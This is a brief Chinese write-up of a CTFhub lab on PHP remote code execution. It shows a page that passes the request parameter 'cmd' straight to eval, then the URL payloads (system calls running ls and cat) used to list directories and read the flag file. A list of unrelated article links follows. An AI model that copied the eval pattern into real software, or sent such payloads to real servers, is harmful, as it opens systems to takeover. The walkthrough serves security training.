CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
打瞌睡的朱尤几秒前
Vue day10 完整购物网页(登录页,首页,搜索)
前端·javascript·vue.js
RFG20121 分钟前
20、详解Dubbo框架:消费方如何动态获取服务提供方地址?【微服务架构入门】
java·人工智能·后端·微服务·云原生·架构·dubbo
扶苏10021 小时前
深入理解 Vue 3 的 watchEffect
前端·javascript·vue.js
zjttsh1 小时前
Linux下安装Redis
java
TimberWill2 小时前
SpringBoot整合Srping Security实现权限控制
java·spring boot·后端
Renhao-Wan2 小时前
Java 算法实践(四):链表核心题型
java·数据结构·算法·链表
未来龙皇小蓝3 小时前
RBAC前端架构-05:引入Element-UI及相关逻辑
前端·ui
_codemonster4 小时前
JavaWeb开发系列(六)JSP基础
java·开发语言
yanlele4 小时前
AI Coding 时代下, 关于你会写代码这件事儿, 还重要吗?
前端·javascript·ai编程
万邦科技Lafite4 小时前
淘宝店铺所有商品API接口实战指南
java·数据库·mysql